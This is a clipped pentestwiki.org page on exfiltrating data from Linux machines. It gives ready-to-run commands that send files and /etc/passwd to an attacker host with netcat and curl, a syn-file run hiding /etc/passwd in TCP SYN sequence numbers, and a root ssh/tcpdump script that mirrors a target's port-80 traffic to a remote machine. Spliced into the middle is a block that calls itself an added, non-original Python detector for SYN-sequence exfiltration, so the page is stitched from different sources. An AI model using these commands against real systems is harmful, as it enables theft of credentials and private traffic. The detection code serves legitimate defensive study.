created: 2022-04-19T19:55:46 (UTC +08:00)
tags: []
source: https://pentestwiki.org/data-exfiltration/
author:
✅ Data Exfiltration - pentestwiki.org
Data Exfiltration in Linux
Raw data exfiltration through port 443
On target machine:
nc -nvv $IP 443 < input.txt
On attacker machine:
nc -nvlp 443 > input.txt
HTTP POST data exfiltration through port 8080
On target machine:
curl -T /etc/passwd http://$IP:8080
On attacker machine:
nc -nvlp 8080 | tee passwd
Data exfiltration using TCP SYN
We can exfiltrate data by encoding it into the sequence numbers of TCP SYN packets, four bytes of the file per SYN, using syn-file (https://github.com/defensahacker/syn-file):
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c
using interface: eth0
#1 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
#2 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
#3 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
#4 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
#5 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
#6 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
#7 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
#8 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
#9 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
#10 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
[...]
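As an added defender-side example (not code from the page or from the syn-file project), the Python below models the encoding visible in the output above, where each 4-byte chunk of the file becomes one big-endian 32-bit sequence number ("at:x" becomes 0x61743a78), and turns it into a detection heuristic: a burst of SYNs from one source whose initial sequence numbers all decode to printable text is not what randomised ISNs look like. The SAMPLE_SEQS values are the ten sequence numbers shown above; RANDOM_ISNS is a constructed set standing in for normal connection attempts.

```python
import string

# Constructed sample: the ten SYN sequence numbers printed by syn-file above
# while sending /etc/passwd ("at:x", ":25:", ..., "ool/").
SAMPLE_SEQS = [0x61743a78, 0x3a32353a, 0x32353a42, 0x61746368, 0x206a6f62,
               0x73206461, 0x656d6f6e, 0x3a2f7661, 0x722f7370, 0x6f6f6c2f]

# Constructed ISNs with high/low bytes, as a randomised TCP stack would emit.
RANDOM_ISNS = [0x8f3a2c11, 0x0a7be4f0, 0xc41d9a03, 0x7e02ffb8,
               0x19c8d5e7, 0xa3f00c6d, 0x5b9e8817, 0xe6027fc9]


def encode_chunk(chunk: bytes) -> int:
    """Pack up to 4 file bytes into one 32-bit SEQ value (big-endian), the
    mapping the tool's log implies. A short final chunk is zero-padded."""
    if len(chunk) > 4:
        raise ValueError("a SYN carries at most 4 payload bytes")
    return int.from_bytes(chunk.ljust(4, b"\0"), "big")


def decode_seqs(seqs) -> bytes:
    """Reassemble the carried bytes from a list of observed SEQ values."""
    return b"".join(s.to_bytes(4, "big") for s in seqs).rstrip(b"\0")


def printable_ratio(seqs) -> float:
    """Fraction of decoded bytes that are printable ASCII."""
    data = decode_seqs(seqs)
    if not data:
        return 0.0
    ok = sum(1 for b in data if chr(b) in string.printable)
    return ok / len(data)


def flag_syn_stream(seqs, min_packets: int = 8, threshold: float = 0.95) -> bool:
    """Detection heuristic for one source/destination pair: enough SYNs whose
    ISNs decode almost entirely to printable text. With random ISNs, each
    byte is printable with probability ~100/256, so a run of 32+ printable
    bytes essentially never happens by chance."""
    return len(seqs) >= min_packets and printable_ratio(seqs) >= threshold
```

Feed it the SEQ field of SYN packets grouped per source address (from a pcap or flow logs) to surface a syn-file style transfer; a hit also tells the responder what text left the host.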
Mirror target traffic on port 80 to a remote host
#!/bin/bash
sudo su -c "mkfifo /tmp/sharkfin"
sudo su -c "chmod 777 /tmp/sharkfin"
sudo su -c "wireshark -k -i /tmp/sharkfin &"
ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 root@192.168.1.1 "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin